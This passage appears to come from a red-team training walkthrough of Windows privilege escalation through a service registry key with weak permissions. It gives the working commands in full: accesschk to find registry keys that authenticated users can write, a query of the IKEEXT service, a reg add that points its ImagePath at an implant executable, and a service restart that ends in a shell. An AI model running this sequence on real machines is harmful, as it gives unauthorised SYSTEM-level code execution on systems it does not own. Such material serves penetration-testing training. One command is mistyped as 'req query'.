now we want to check for insecure registers
c:\\RTO\\Tools\\SI\\accesschk.exe -accepteula -kvuqsw hklm\\System\\CurrentControlSet\\services > c:\\temp\\regs.txt
as we see this is the output of the command
as we see i searched for the access for the authenticated users and i got a read and write permissions for that registry
now let’s query the registry
req query HKLM\\SYSTEM\\CurrentControlSet\\services\\IKEEXT
as we see we have this image path that we can hijack
so let’s change the value of the image path with this one-liner
reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\IKEEXT /v ImagePath /t REG_EXPAND_SZ /d C:\\rto\\lpe\\implant\\implantsrv.exe /f
sc stop ikeext
sc start ikeext
and happy shell
.\\accesschk.exe -accepteula -kvuqsw hklm\\System\\CurrentControlSet\\services > c:\\privesc\\regs.txt